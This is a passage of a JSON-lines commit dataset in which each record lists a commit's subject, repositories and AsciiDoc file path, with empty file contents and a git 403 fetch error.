Bolt","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-31-The-Secret-Bolt.adoc","new_file":"_posts\/2015-03-31-The-Secret-Bolt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65555fdd8515c615bdd2bf7840f68e4d656fc2e3","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14262324c04852b78fa48a715fc28071f33fe2af","subject":"Update 2018-05-20-Your-Blog-title.adoc","message":"Update 2018-05-20-Your-Blog-title.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2018-05-20-Your-Blog-title.adoc","new_file":"_posts\/2018-05-20-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93b980bbf6100bad953ff638fac9801ee25efd74","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/TestingEE.adoc","new_file":"Best practices\/TestingEE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f69ffaac52f429198605d7e84c092ff442c98be","subject":"Update 2016-10-06-Blockchain-for-healthcare-industry.adoc","message":"Update 2016-10-06-Blockchain-for-healthcare-industry.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-06-Blockchain-for-healthcare-industry.adoc","new_file":"_posts\/2016-10-06-Blockchain-for-healthcare-industry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b79429fdaaccc7844675f69390e1278e01d290c7","subject":"chore: Added CLA part on the contributing doc","message":"chore: Added CLA part on the contributing doc\n","repos":"gravitee-io\/gravitee.io,gravitee-io\/gravitee.io,gravitee-io\/gravitee.io","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55103053be4ff346a980361153e5109076237b9d","subject":"Update 2015-08-24-Simple-post.adoc","message":"Update 
2015-08-24-Simple-post.adoc","repos":"pascalgrimaud\/hubpress.io,pascalgrimaud\/hubpress.io,pascalgrimaud\/hubpress.io","old_file":"_posts\/2015-08-24-Simple-post.adoc","new_file":"_posts\/2015-08-24-Simple-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pascalgrimaud\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45c82aca95ca91f55d7bd90db59c0c833bf94db0","subject":"Renamed '_posts\/2019-01-31-Cyber-Exile.adoc' to '_posts\/2017-10-27-Cyber-Exile.adoc'","message":"Renamed '_posts\/2019-01-31-Cyber-Exile.adoc' to '_posts\/2017-10-27-Cyber-Exile.adoc'","repos":"netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io","old_file":"_posts\/2017-10-27-Cyber-Exile.adoc","new_file":"_posts\/2017-10-27-Cyber-Exile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netrunnerX\/netrunnerx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8750c1ac8e5b3175830f910899f449142c6225fc","subject":"Dropping into debug","message":"Dropping into debug\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"03b89a038b55ca5ad7de6cfd7ce99f5d7e1fb3f5","subject":"Add README stub","message":"Add README stub\n","repos":"dexX7\/java-libbitcoinconsensus,dexX7\/java-libbitcoinconsensus,JornC\/java-libbitcoinconsensus","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JornC\/java-libbitcoinconsensus.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9022568e588b168ad01b4c5db337be4fbd2b8a0a","subject":"[#14] Add build automation badges (#15)","message":"[#14] Add build automation badges (#15)\n\nCloses #14","repos":"Gman98ish\/byteslice","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Gman98ish\/byteslice.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c543f73c9b472b6fa27f14c82b2ece60630e1be","subject":"Create README.adoc","message":"Create README.adoc","repos":"teacurran\/personal-api,teacurran\/personal-api,teacurran\/personal-api","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teacurran\/personal-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99294de7c9ad43c3fde2060fb42b819827bcee06","subject":"Add readme","message":"Add readme\n","repos":"guigolab\/bamstats,guigolab\/bamstats","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/guigolab\/bamstats.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fde457d4d8aaf6d08f7c845d7e65f47be0290bc2","subject":"COMPILING: Unofficial DeuTex has a 
new unofficial home!","message":"COMPILING: Unofficial DeuTex has a new unofficial home!\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"COMPILING.adoc","new_file":"COMPILING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"bfbbbc9a793940d85aeb93952c96d4ce4b705b71","subject":"Update 2015-08-18-test-2.adoc","message":"Update 2015-08-18-test-2.adoc","repos":"jiashengc\/blog,jiashengc\/blog,jiashengc\/blog","old_file":"_posts\/2015-08-18-test-2.adoc","new_file":"_posts\/2015-08-18-test-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jiashengc\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06aab90b3d3c7e338216f84fb2c05f6faff65baf","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"223c74011b0389ecfc7d88197c857b737e1b418f","subject":"Update 2019-01-25-Nuxt-Typescript.adoc","message":"Update 2019-01-25-Nuxt-Typescript.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-25-Nuxt-Typescript.adoc","new_file":"_posts\/2019-01-25-Nuxt-Typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c523ccbbf87dbdeabdfea96fb8a8e07dc8892adc","subject":"Update 2015-12-19-titre-1.adoc","message":"Update 2015-12-19-titre-1.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2015-12-19-titre-1.adoc","new_file":"_posts\/2015-12-19-titre-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8409e9d22dd81fd4b41dda2eb803c1b5b42e96f8","subject":"release notes: add KUDU-2190 and KUDU-2173 for 1.6.0","message":"release notes: add KUDU-2190 and KUDU-2173 for 1.6.0\n\nChange-Id: Ib5b01a77b07073f529f31e5a9fb06af9afa113be\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8703\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy 
<e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d9c3ecef3d97bbc6ce09878a6ea65efae95cb9b","subject":"Update 2016-01-29-Puzzle-3-Hack-Me-Baby.adoc","message":"Update 2016-01-29-Puzzle-3-Hack-Me-Baby.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-29-Puzzle-3-Hack-Me-Baby.adoc","new_file":"_posts\/2016-01-29-Puzzle-3-Hack-Me-Baby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e467a58fb8c0fb0b7b0a67af7a322a3b47326679","subject":"y2b create post PS4 Pro - Does It Suck?","message":"y2b create post PS4 Pro - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-11-PS4-Pro--Does-It-Suck.adoc","new_file":"_posts\/2016-11-11-PS4-Pro--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26df15fa5a53cbbb96aa444ebb138bf15a9bec4b","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d81a901d34b02d027f5dfcc1ba780950f49bb61","subject":"Update 2016-12-09-Azure-Machine-Learning.adoc","message":"Update 
2016-12-09-Azure-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac00d5748fe930a52ada182789f0a290484394cc","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8e2483e74685e902391a4999ed1a1e4fd769488","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02ee796317837134bea4a1904cc4fefe378d6a24","subject":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef00d2ec284281863c1a528081a0cc160ec09a32","subject":"Update 2017-05-01-navegacao-com-tabview.adoc","message":"Update 2017-05-01-navegacao-com-tabview.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-05-01-navegacao-com-tabview.adoc","new_file":"_posts\/2017-05-01-navegacao-com-tabview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69acbe8a5fd1c9eda0d6d577eefc00b889a86c1c","subject":"Update 2019-05-17-Logging-configuration.adoc","message":"Update 
2019-05-17-Logging-configuration.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2019-05-17-Logging-configuration.adoc","new_file":"_posts\/2019-05-17-Logging-configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d02f03dca258184ef77b0c9a3931154afbe0d079","subject":"Update 2016-04-16-B-L-A-N-K-04.adoc","message":"Update 2016-04-16-B-L-A-N-K-04.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-16-B-L-A-N-K-04.adoc","new_file":"_posts\/2016-04-16-B-L-A-N-K-04.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb861d8da23f540ba21b2686fccd22718484dc70","subject":"Update 2017-07-15-Number-letter-count-Projeto-Euler-2.adoc","message":"Update 2017-07-15-Number-letter-count-Projeto-Euler-2.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler-2.adoc","new_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"783cc0f26e2bcb79c2f011e11d4dd82d4d4d87aa","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4732f3c4d888cd19c6772e3df94720e87dadce2","subject":"Update 2016-12-07-Can-I-set-this-to-a-past-date.adoc","message":"Update 2016-12-07-Can-I-set-this-to-a-past-date.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-07-Can-I-set-this-to-a-past-date.adoc","new_file":"_posts\/2016-12-07-Can-I-set-this-to-a-past-date.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e78f09a1d6e9255bc98d89da0ddd6b42936c0e0","subject":"update shield limitations around document level security","message":"update shield limitations around document level security\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@4afbf69ce24b31ecd4f55148c17d28da7b57c86a\n","repos":"scorpionvicky\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,nknize\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,vroyer\/elassandra,nknize\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"shield\/docs\/public\/limitations.asciidoc","new_file":"shield\/docs\/public\/limitations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3fe65a225e7adb57dea4c9384ff81d2ec0794bab","subject":"Update 2015-08-25-Hello-World.adoc","message":"Update 2015-08-25-Hello-World.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-08-25-Hello-World.adoc","new_file":"_posts\/2015-08-25-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f26b875b30e8c683895b62cf8252f55eaf2e51fc","subject":"Update 2016-08-12-primer-post.adoc","message":"Update 2016-08-12-primer-post.adoc","repos":"roamarox\/roamarox.github.io,roamarox\/roamarox.github.io,roamarox\/roamarox.github.io,roamarox\/roamarox.github.io","old_file":"_posts\/2016-08-12-primer-post.adoc","new_file":"_posts\/2016-08-12-primer-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roamarox\/roamarox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb1c75e46f2a1d5e088377f0ee6c49218ee93bd5","subject":"Update 2017-05-29-Hello-World.adoc","message":"Update 2017-05-29-Hello-World.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-29-Hello-World.adoc","new_file":"_posts\/2017-05-29-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a3579bd3f3a5f9e092a9cebfd402e111d229ab6","subject":"removed 
IssueStats badges, service down [skip ci]","message":"removed IssueStats badges, service down [skip ci]","repos":"gencer\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM,gencer\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM,WPN-XM\/WPN-XM,WPN-XM\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/WPN-XM\/WPN-XM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"797d56681373e508c68bc538cad61e687b48f106","subject":"add README","message":"add README\n\n\ngit-svn-id: 6e2e506005f11016269006bf59d22f905406eeba@1758244 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"apache\/openwebbeans,apache\/openwebbeans,apache\/openwebbeans","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/openwebbeans.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d50d424f9e79b221fdaa1a445b87f019b72ed606","subject":"[Readme] asciidoc readme","message":"[Readme] asciidoc readme\n\nFor the benifit of github.\n","repos":"kprovost\/libs7comm,kprovost\/libs7comm","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kprovost\/libs7comm.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f4ed2bb0d41c3923d2729567c7082ce6de08b645","subject":"rename md to asciidoc","message":"rename md to asciidoc\n","repos":"bsorrentino\/forge-js-addon,bsorrentino\/forge-dynjs-addon,bsorrentino\/forge-js-addon,bsorrentino\/forge-dynjs-addon","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bsorrentino\/forge-dynjs-addon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe17d52178e016f83fb80ac2641111f9cf5bff93","subject":"Create scala_first_steps.adoc","message":"Create scala_first_steps.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"scala_first_steps.adoc","new_file":"scala_first_steps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"a319aad26c5f2ea9c042517d5a5297976137631a","subject":"provide a first unpolished overview to mind","message":"provide a first unpolished overview to mind\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"690c668e560ca14f144eb25a8cacd8a744c8bccd","subject":"Update 2016-09-28-Episode-73-Marvel-at-Timelords.adoc","message":"Update 
2016-09-28-Episode-73-Marvel-at-Timelords.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-09-28-Episode-73-Marvel-at-Timelords.adoc","new_file":"_posts\/2016-09-28-Episode-73-Marvel-at-Timelords.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f58467bf4ebba81fd3389c446a25e81ae021904c","subject":"Update 2017-05-31-Controll-Flow-Statements.adoc","message":"Update 2017-05-31-Controll-Flow-Statements.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Controll-Flow-Statements.adoc","new_file":"_posts\/2017-05-31-Controll-Flow-Statements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86d671eaca12fb711f36c4d2b29203024c5552e6","subject":"How to set up.","message":"How to set up.\n","repos":"LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava","old_file":"SETUP.adoc","new_file":"SETUP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTree\/TicketManorJava.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e6ddb6b8c8542b941be6edbcc4ab3ab2108468b","subject":"Deleted 2016-12-2-3-D.adoc","message":"Deleted 